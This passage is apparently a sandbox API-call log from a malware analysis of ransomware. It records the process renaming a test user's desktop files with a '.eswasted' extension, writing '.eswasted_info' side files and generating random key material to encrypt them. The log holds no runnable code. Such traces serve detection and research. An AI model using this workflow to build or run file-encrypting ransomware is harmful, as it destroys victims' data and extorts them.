dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.746] lstrcpyW (in: lpString1=0x4e1b44, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\22Df7iMWnQgkG.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\22df7imwnqgkg.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\22Df7iMWnQgkG.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\22df7imwnqgkg.jpg.eswasted")) returned 1 [0071.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\22Df7iMWnQgkG.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\22df7imwnqgkg.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.748] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.748] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xa350 [0071.748] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa350) returned 0x2d0000 [0071.748] CloseHandle (hObject=0xf8) returned 1 [0071.751] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.752] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.752] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.752] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.753] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.753] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.762] SetEndOfFile (hFile=0xfc) returned 1 [0071.764] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.764] CloseHandle (hObject=0xfc) returned 1 [0071.772] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.772] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0071.772] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.773] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.773] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.773] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\f7iAQEckri_tD.csv") returned 70 [0071.773] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x296) returned 0x4e1ab8 [0071.773] lstrcpyW (in: lpString1=0x4e1b44, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.773] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.773] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.774] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.774] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\f7iAQEckri_tD.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\f7iaqeckri_td.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.775] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.776] SetEndOfFile (hFile=0xfc) returned 1 [0071.776] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.776] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.776] lstrcpyW (in: lpString1=0x4e1b44, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\f7iAQEckri_tD.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\f7iaqeckri_td.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\f7iAQEckri_tD.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\f7iaqeckri_td.csv.eswasted")) returned 1 [0071.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\f7iAQEckri_tD.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\f7iaqeckri_td.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.777] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0071.777] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x61b8 [0071.777] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61b8) returned 0x2d0000 [0071.778] CloseHandle (hObject=0x100) returned 1 [0071.780] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.781] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.781] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.781] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.781] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.781] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.790] SetEndOfFile (hFile=0xfc) returned 1 [0071.792] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.792] CloseHandle (hObject=0xfc) returned 1 [0071.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec0d8 | out: hHeap=0x4a0000) returned 1 [0071.793] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.794] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.794] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.794] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\fHK1q.avi") returned 62 [0071.794] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x286) returned 0x4e1ab8 [0071.794] lstrcpyW (in: lpString1=0x4e1b34, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.794] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.794] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.795] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.795] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\fHK1q.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\fhk1q.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.795] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.796] SetEndOfFile (hFile=0xfc) returned 1 [0071.796] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.796] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.797] lstrcpyW (in: lpString1=0x4e1b34, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\fHK1q.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\fhk1q.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\fHK1q.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\fhk1q.avi.eswasted")) returned 1 [0071.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\fHK1q.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\fhk1q.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.797] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.798] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x3c58 [0071.798] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c58) returned 0x2d0000 [0071.798] CloseHandle (hObject=0xf8) returned 1 [0071.799] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.800] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.800] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.800] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.801] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.801] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.809] SetEndOfFile (hFile=0xfc) returned 1 [0071.811] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.811] CloseHandle (hObject=0xfc) returned 1 [0071.814] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.814] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec1c0 | out: hHeap=0x4a0000) returned 1 [0071.814] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.815] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.815] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.815] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0hIBcRL.png") returned 80 [0071.815] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f6210 [0071.815] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.815] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.815] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.816] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.816] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0hIBcRL.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\0hibcrl.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.816] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.817] SetEndOfFile (hFile=0xfc) returned 1 [0071.817] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.818] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.818] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0hIBcRL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\0hibcrl.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0hIBcRL.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\0hibcrl.png.eswasted")) returned 1 [0071.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0hIBcRL.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\0hibcrl.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.818] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0071.851] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x18dac [0071.851] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18dac) returned 0xb10000 [0071.851] CloseHandle (hObject=0x100) returned 1 [0071.858] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.858] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.858] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.858] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.859] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.859] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.868] SetEndOfFile (hFile=0xfc) returned 1 [0071.870] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.870] CloseHandle (hObject=0xfc) returned 1 [0071.871] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0071.871] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed4f8 | out: hHeap=0x4a0000) returned 1 [0071.871] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.872] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.872] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\23gTV.gif") returned 78 [0071.872] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a6) returned 0x4e1368 [0071.872] lstrcpyW (in: lpString1=0x4e1404, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.872] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.872] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.873] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.873] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\23gTV.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\23gtv.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.873] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.874] SetEndOfFile (hFile=0xfc) returned 1 [0071.874] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.874] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.874] lstrcpyW (in: lpString1=0x4e1404, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\23gTV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\23gtv.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\23gTV.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\23gtv.gif.eswasted")) returned 1 [0071.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\23gTV.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\23gtv.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.875] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.875] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xe186 [0071.875] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe186) returned 0x2d0000 [0071.875] CloseHandle (hObject=0xf8) returned 1 [0071.879] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.879] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.879] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.879] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.880] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.880] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.889] SetEndOfFile (hFile=0xfc) returned 1 [0071.891] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.891] CloseHandle (hObject=0xfc) returned 1 [0071.892] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0071.892] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e44c8 | out: hHeap=0x4a0000) returned 1 [0071.893] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.893] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.893] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\5HdVev6ab9mGSD4Qk.wav") returned 90 [0071.893] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2be) returned 0x4e1368 [0071.893] lstrcpyW (in: lpString1=0x4e141c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.893] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.893] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.894] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.894] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\5HdVev6ab9mGSD4Qk.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\5hdvev6ab9mgsd4qk.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.895] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.896] SetEndOfFile (hFile=0xfc) returned 1 [0071.896] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 